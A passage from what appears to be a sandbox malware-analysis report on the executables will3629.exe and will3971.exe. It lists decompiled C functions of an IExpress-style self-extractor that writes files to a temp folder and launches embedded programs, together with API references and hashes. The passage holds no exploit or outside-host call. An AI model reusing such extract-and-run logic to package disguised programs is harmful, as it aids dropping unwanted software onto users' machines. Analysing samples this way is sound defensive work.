					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xac8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xac8004 = _t39;
				}
				_t37 =  !_t36;
				 *0xac8008 = _t37;
				return _t37;
			}

0x00ac715d
0x00ac7161
0x00ac7165
0x00ac7178
0x00ac7182
0x00ac718e
0x00ac7197
0x00ac71a0
0x00ac71b1
0x00ac71b8
0x00ac71c4
0x00ac71c7
0x00ac71cb
0x00ac71d5
0x00ac71da
0x00ac71da
0x00ac71dc
0x00ac71dc
0x00ac71e2
0x00ac71e5
0x00ac71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AC7182
GetCurrentProcessId.KERNEL32 ref: 00AC7191
GetCurrentThreadId.KERNEL32 ref: 00AC719A
GetTickCount.KERNEL32 ref: 00AC71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00AC71B8

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 66275892ac91dd85f1947ae61ddd6d8073cb8ccd33d06c7b34829b473627c3f4
Instruction ID: bb32bb97408fae05a0b30258773cdb65bd7d3d749c4a35a2ae2c15b31274dab3
Opcode Fuzzy Hash: 66275892ac91dd85f1947ae61ddd6d8073cb8ccd33d06c7b34829b473627c3f4
Instruction Fuzzy Hash: E4112875D01208DBCB10DFF8DA48AAEB7F4FB18314F664A59D806E7210EB349A058B41

Uniqueness

Uniqueness Score: -1.00%

Function 00AC63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00AC63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xac8004; // 0xc32e3ded
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00AC1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
				E00AC658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xac9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xac9124 = 0x80070052;
					_t37 = 0;
				}
				return E00AC6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00ac63cb
0x00ac63d2
0x00ac63d8
0x00ac63ea
0x00ac63f3
0x00ac6401
0x00ac6402
0x00ac6410
0x00ac6415
0x00ac6433
0x00ac6438
0x00ac6449
0x00ac6463
0x00ac646d
0x00ac6477
0x00ac6477
0x00ac647a
0x00ac643a
0x00ac643a
0x00ac6444
0x00ac6444
0x00ac6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC647A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC63EB

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 1065093856-183442868
Opcode ID: 3df9f8de7600ea70f5ea4c3c112d5e0ddf20e7851a88a101bb21aca57fbede8a
Instruction ID: d23ef14f52c7ddc668b5826e1413ed3c699bdca9424e181a45b71c71a16c9dfc
Opcode Fuzzy Hash: 3df9f8de7600ea70f5ea4c3c112d5e0ddf20e7851a88a101bb21aca57fbede8a
Instruction Fuzzy Hash: 5A2102B1A0021CABDB10DF65DD89FEB73B8EB49314F0102A9F595A3280CBB05D858FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00AC1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xac91e0; // 0x2eb7b60
						 *(_t34 + 4) = _t11;
						 *0xac91e0 = _t34;
						return 1;
					}
					_t25 =  *0xac8584; // 0x0
					E00AC44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xac8584; // 0x0
				E00AC44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00ac47e8
0x00ac47f0
0x00ac47f4
0x00ac480f
0x00ac4811
0x00ac4814
0x00ac4814
0x00ac4816
0x00ac4817
0x00ac4829
0x00ac482b
0x00ac482f
0x00ac484f
0x00ac4852
0x00ac4855
0x00ac4855
0x00ac4857
0x00ac4858
0x00ac4860
0x00ac4865
0x00ac486a
0x00ac486f
0x00000000
0x00ac4876
0x00ac4831
0x00ac4841
0x00ac4847
0x00ac480b
0x00000000
0x00ac480b
0x00ac47f6
0x00ac4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00AC4E6F), ref: 00AC47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00AC4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00AC4847

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC4851

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 359063898-183442868
Opcode ID: 8824e99918c5639cd14411d1873328490f17aa1cb78162ada5919dd4ae765b58
Instruction ID: 18b5931790568682358bf7db12d44fac129f2455ca3d829b68e38d1c57196e6f
Opcode Fuzzy Hash: 8824e99918c5639cd14411d1873328490f17aa1cb78162ada5919dd4ae765b58
Instruction Fuzzy Hash: F9112975604641AFEB14CF749C28F733B9AEB89300F16851DF98297341DA358C078764

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00ac368c
0x00ac368f
0x00ac3691
0x00ac369f
0x00ac36a7
0x00000000
0x00000000
0x00ac36ba
0x00000000
0x00ac36bc
0x00ac36bc
0x00ac36c0
0x00ac36cb
0x00ac36c2
0x00ac36c4
0x00ac36c4
0x00ac36da
0x00ac36e0
0x00ac36e6
0x00000000
0x00000000
0x00ac36e6
0x00000000
0x00ac36ba
0x00ac36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00AC369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36B2
DispatchMessageA.USER32(?), ref: 00AC36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36DA

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: cfa16c19f46fd035aeb89318efd15681a62fb91d2c65d96c37b91ed23db50a99
Instruction ID: ee9ac267a3e1464614d3ea284d0d7da73b39890b8ce6f83c70dbccd42be04a6f
Opcode Fuzzy Hash: cfa16c19f46fd035aeb89318efd15681a62fb91d2c65d96c37b91ed23db50a99
Instruction Fuzzy Hash: C301847390021877DF308BE65C4CFEB777CEB85B14F05421DB915E2280D6608641C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00AC6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xac9a3c; // 0xac0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00AC44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00ac651f
0x00ac652a
0x00ac6534
0x00ac656b
0x00ac6577
0x00ac657c
0x00ac6536
0x00ac653e
0x00ac6542
0x00000000
0x00ac6544
0x00ac6547
0x00ac654c
0x00ac6549
0x00ac6549
0x00ac6549
0x00ac655e
0x00ac6560
0x00ac6569
0x00000000
0x00000000
0x00ac6569
0x00ac6542
0x00ac6587

APIs

FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: d6d3a3b4ef3d80527155bddcf99ff48964b6e8426c6ea53ec7f81f8736fa842d
Instruction ID: 73d0f6eb70b5b5f1e2cbf881342bb1f83809fd55c0d0bd2a64438bb440a55d36
Opcode Fuzzy Hash: d6d3a3b4ef3d80527155bddcf99ff48964b6e8426c6ea53ec7f81f8736fa842d
Instruction Fuzzy Hash: 6601267250060DBBCB10DFA9AC08EBB7A6CEB89364F160229FE1093150DB71CC11C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00AC65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00ac65e8
0x00ac65ed
0x00ac65ef
0x00ac65f2
0x00ac65f4
0x00ac65f4
0x00ac65f6
0x00ac65f7
0x00ac6608
0x00ac6611
0x00ac6618
0x00ac661c
0x00000000
0x00000000
0x00ac660e
0x00ac6623
0x00ac6625
0x00ac663b
0x00ac663b
0x00ac663d
0x00ac6641
0x00ac6610
0x00ac6610
0x00000000
0x00ac6610
0x00ac6644
0x00ac6647
0x00ac6647
0x00ac6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00AC2B33), ref: 00AC6602
CharPrevA.USER32(?,00000000), ref: 00AC6612
CharPrevA.USER32(?,00000000), ref: 00AC6629
CharNextA.USER32(00000000), ref: 00AC6635

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 2541e9092df2abd33566ee43e6edcd780f94b6670e847fbbc326f3b2c65a800e
Instruction ID: a7a2605a94388d0adf783b77256fe0a42541242b736acb55fbd96c901f89c2c4
Opcode Fuzzy Hash: 2541e9092df2abd33566ee43e6edcd780f94b6670e847fbbc326f3b2c65a800e
Instruction Fuzzy Hash: 61F028320041906EE7369B698C8CEBBBF9CCF9B358B2F02BFE4A183001D6150D078662

Uniqueness

Uniqueness Score: -1.00%

Function 00AC69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xac81f8 = E00AC6C70();
				__set_app_type(E00AC6FBE(2));
				 *0xac88a4 =  *0xac88a4 | 0xffffffff;
				 *0xac88a8 =  *0xac88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xac8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xac851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00AC7000();
				if( *0xac8000 == 0) {
					__setusermatherr(E00AC7000);
				}
				E00AC71EF(_t6);
				return 0;
			}

0x00ac69b7
0x00ac69c2
0x00ac69c8
0x00ac69cf
0x00ac69d8
0x00ac69de
0x00ac69e4
0x00ac69e6
0x00ac69ec
0x00ac69f2
0x00ac69f4
0x00ac6a00
0x00ac6a07
0x00ac6a0d
0x00ac6a0e
0x00ac6a15

APIs

Part of subcall function 00AC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00AC6FC5

__set_app_type.MSVCRT ref: 00AC69C2
__p__fmode.MSVCRT ref: 00AC69D8
__p__commode.MSVCRT ref: 00AC69E6
__setusermatherr.MSVCRT ref: 00AC6A07

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: f114f2ef10db650e3f137fd6bf9d17d2cb03bddbff0d1d3c71705fc4000c9f4b
Instruction ID: 5f706f0d73c9bfdd797c8d3b9efc9e45a1f070df281de09b096c6862047feade
Opcode Fuzzy Hash: f114f2ef10db650e3f137fd6bf9d17d2cb03bddbff0d1d3c71705fc4000c9f4b
Instruction Fuzzy Hash: ADF0DFB01083198FC718EBB0AE0AF683BA1BB14325B13060DE462962F0CF7E85438B11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: will3971.exePID: 5456, Parent PID: 5480COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 002F3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E002F3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x2f8004; // 0x404cc811
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x2f9124 =  *0x2f9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x2f8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x2f8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E002F468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x2f9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E002F1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E002F6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E002F3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x2f8580;
													if( *0x2f8580 != 0) {
														E002F2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x2f8180;
											if( *0x2f8180 == 0) {
												_t146 = 0x4c7;
												E002F44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x2f9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x2f9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E002F6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E002F44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x2f9124 = E002F6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E002F44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x2f8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x2f9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x2f8a38 & 0x0000ffff;
											_v380 = 0x2f9154;
											_v376 = _t151;
											_v372 = 0x2f91e4;
											_v360 = _t97;
											if( *0x2f8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x2f9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x2f8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x2f9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x2fa288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x2f9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x2f9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x2f8a20;
										if( *0x2f8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E002F202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E002F468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x2f8c42;
									if( *0x2f8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x2f8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E002F468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E002F468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E002F1781( &_v276, 0x104, _t130, 0x2f8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E002F468F(_t130, 0x2f9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x002f3baa
0x002f3bb0
0x002f3bb7
0x002f3bc0
0x002f3bc2
0x002f3bc9
0x002f3bcb
0x002f3bcf
0x002f3bd3
0x002f3bd9
0x002f3bfd
0x002f3bfd
0x002f3bff
0x002f3c03
0x002f3c03
0x002f3c11
0x002f3c16
0x002f3c19
0x002f3c28
0x00000000
0x00000000
0x002f3c30
0x002f3c39
0x002f3c40
0x002f3d13
0x002f3d15
